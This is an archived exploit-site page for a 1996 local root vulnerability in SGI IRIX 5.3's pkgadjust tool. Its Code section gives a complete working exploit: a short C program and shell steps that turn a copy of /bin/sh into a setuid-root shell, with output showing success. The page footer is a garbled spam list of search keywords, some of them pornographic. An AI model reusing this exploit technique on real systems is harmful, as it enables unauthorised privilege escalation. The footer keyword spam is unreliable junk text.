about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , IRIX pkgadjust Vulnerability


Title IRIX pkgadjust Vulnerability
Published 1996-09-23-12:00AM
Updated 1999-06-01-12:00AM
Class Access Validation Error
CVE   GENERIC-MAP-N ATCH
Remote  No
Local  Yes
Credit  This vulnerability was reported to the Bugtraq mailing list by Hui-Hui Hu <hhui@stardot.net> on January 27, 1996.
Vulnerable  SGI IRIX 5.3
Not Vulnerable  
Code   % cat > getroot.c
int main() { setuid(0); chown("sh",0,0); chmod("sh",04755); return 0; }
% cc getroot.c -o getroot
% cp /bin/sh sh
% ls -la sh
-rwxr-xr-x 1 hhui user 140784 Jan 5 20:52 sh
% /usr/pkg/bin/pkgadjust -f -a getroot
scanning inst-database

updating pkginfo-files
........................................^C
% ls -la sh
-rwsr-xr-x 1 root sys 140784 Jan 5 20:52 sh
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 11:09:47 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
oelib lauxanh.us xlxx3 xxx hindi news for c shop589835 peneroka sex vedio yego8.com lauxanh.us www.lhsql. sykssy animal sex news for c Invision B www.trish free video Video porn home sex v n...Fmenu/ xxxsexmove p...2Fid.t www.ppmar. ms05-008 Sexy.photo nexxx 200+%252Fm apache 1.3 free sexul www.ud8888 www.job588 www.wangru Indai puss News+Searc shortage o php%252525 Foto vagin news for c Sexcy ram www.Queen8 Snehasex c 200 /compo Tamil porn 200+%252Fm Chicas sex php-nuke 2 www kar20 liz hurley http://ric Naked indi